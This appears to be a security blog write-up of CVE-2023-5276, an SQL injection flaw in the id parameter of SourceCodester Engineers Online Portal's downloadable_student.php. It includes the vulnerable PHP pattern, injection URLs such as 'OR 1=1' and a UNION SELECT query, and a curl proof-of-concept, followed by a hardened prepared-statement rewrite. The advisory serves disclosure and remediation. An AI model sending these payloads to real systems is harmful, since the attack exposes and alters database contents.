A serious vulnerability, CVE-2023-5276, was found in the SourceCodester Engineers Online Portal version 1. This flaw allows attackers to perform SQL injection through the downloadable_student.php file by manipulating the id parameter. If you run this web application, you are at risk of attackers stealing or destroying data in your database.
In this post, we'll break down what this vulnerability is, how an attack works, the real code involved, and show you step-by-step how someone could exploit it. You'll also find references to the original research and mitigation tips.
What Is CVE-2023-5276?
CVE-2023-5276 is a unique identifier for a critical vulnerability found in Engineers Online Portal 1., made by SourceCodester. An attacker can inject malicious SQL into a request parameter, taking full control of the database backend. The bad code sits in downloadable_student.php, exactly where the web app expects a student id.
CVE and Database Entry:
- CVE-ID: CVE-2023-5276
- Vulnerability Database: VDB-240904
Where’s the Problem in the Code?
In the downloadable_student.php file, user input is taken directly from the URL or form—without filtering or escaping—and then used inside a SQL query. That’s a classic SQL injection setup.
Here’s a simplified snippet like what you’d find in the app:
<?php
// downloadable_student.php
include('db.php'); // Connect to the database
$id = $_GET['id']; // User input from URL
$query = "SELECT * FROM students WHERE id = $id"; // BAD! No filtering here
$result = mysqli_query($conn, $query);
$row = mysqli_fetch_assoc($result);
// ... Display or use $row data
?>
Why is this bad?
The $id value from the URL is used directly in SQL, without quotes, type-checking, or escaping. If an attacker sends something besides a number, like 1 OR 1=1, the query suddenly looks like:
SELECT * FROM students WHERE id = 1 OR 1=1
Because 1=1 is always true, that query returns every student record instead of the single one the page was meant to show. Attackers can get even more creative, reading, changing, or deleting data.
How Easy Is It To Exploit?
An attacker doesn't need a login or special access. They can just use a browser or a tool like curl or Burp Suite. Here’s how a real attack might look:
Step 1: The Normal Request
Usually, the file is accessed with something like:
http://target-site.com/downloadable_student.php?id=1
Step 2: Change the id Value
Now, an attacker changes the id value to SQL code:
http://target-site.com/downloadable_student.php?id=1 OR 1=1
Step 3: See All Data
Instead of getting info for just one student, the site spits out all student records, or sometimes even sensitive info if you keep tweaking the injection.
To dump the database version:
http://target-site.com/downloadable_student.php?id=1 UNION SELECT 1,@@version,3,4--
This SQL trick fetches the database version info, proving you can inject and control the backend.
Proof-of-Concept (PoC) Request with curl
curl "http://target-site.com/downloadable_student.php?id=1%20UNION%20SELECT%201,2,3,4--+"
If you see unexpected data or error messages, you know the site’s vulnerable.
It becomes possible to run further attacks (even remote code execution, in some cases).
No login or insider access is needed. The attack is remote and automatic.
How To Fix It
If you maintain this app—or any PHP/MySQL project—fixing this is urgent.
Review user access controls.
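As an added example (not code from SourceCodester or from the original post), here is a hardened rewrite of the downloadable_student.php snippet shown earlier that applies the parameterized-query advice from this post. It assumes db.php provides a mysqli connection in $conn, as the original snippet implies, and that the mysqlnd driver is available so that get_result() works; the helper names validate_student_id and fetch_student are introduced here and are not part of the app.

```php
<?php
// downloadable_student.php, hardened rewrite (added example, not the app's own code).
// Assumes db.php defines $conn as a mysqli connection, as the original snippet implies.

// Pure validation helper: the id must be a whole positive integer and nothing else.
// FILTER_VALIDATE_INT rejects "1 OR 1=1" and "1 UNION SELECT ..." outright, and the
// is_string check rejects array input such as ?id[]=1.
function validate_student_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Fetch one student row with a prepared statement. The id travels to the server
// as a bound integer parameter and is never interpolated into the SQL text.
function fetch_student(mysqli $conn, int $id): ?array
{
    $stmt = $conn->prepare('SELECT * FROM students WHERE id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $result = $stmt->get_result(); // requires mysqlnd (assumption)
    $row = $result->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

if (PHP_SAPI !== 'cli') {
    // Web request: reject bad input with a 400 before touching the database.
    include 'db.php';
    $id = validate_student_id($_GET['id'] ?? '');
    if ($id === null) {
        http_response_code(400);
        exit('Invalid student id');
    }
    $row = fetch_student($conn, $id);
    // ... display or use $row data
} else {
    // Command-line self-check: constructed sample inputs, including the
    // payload shapes discussed in this post, run through the validator only.
    $samples = ['1', '42', '1 OR 1=1', '1 UNION SELECT 1,@@version,3,4--', '-5', 'abc'];
    foreach ($samples as $s) {
        $v = validate_student_id($s);
        printf("%-40s => %s\n", var_export($s, true), $v === null ? 'rejected' : "accepted as $v");
    }
}
```

Run it from the command line (php downloadable_student.php) to see which sample values the validator accepts; only '1' and '42' pass, everything else is rejected before any SQL is built. Validation alone is not the fix, though: the prepared statement is what guarantees the id can never change the query's structure, and the validator simply turns malformed requests into clean 400 responses that are easy to spot in access logs.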
If you use SourceCodester’s code, check their repository for an update:
- SourceCodester Official Download
References and Further Reading
- Original VulDB Entry (VDB-240904)
- CVE Details - CVE-2023-5276
- OWASP SQL Injection Cheat Sheet
- PHP: SQL Injection - Manual
Final Thoughts
CVE-2023-5276 is a classic but devastating example of why it's critical to handle user input safely. This bug could allow hackers to take complete control of the Engineers Online Portal database with just a simple URL tweak. If you're running this code, update or patch it NOW. And always use parameterized queries so you don’t end up on the next security bulletin.
Stay safe, and audit your code regularly!
If you have questions or need a more technical walk-through, leave a comment below.
Timeline
Published on: 09/29/2023 18:15:09 UTC
Last modified on: 11/07/2023 04:23:45 UTC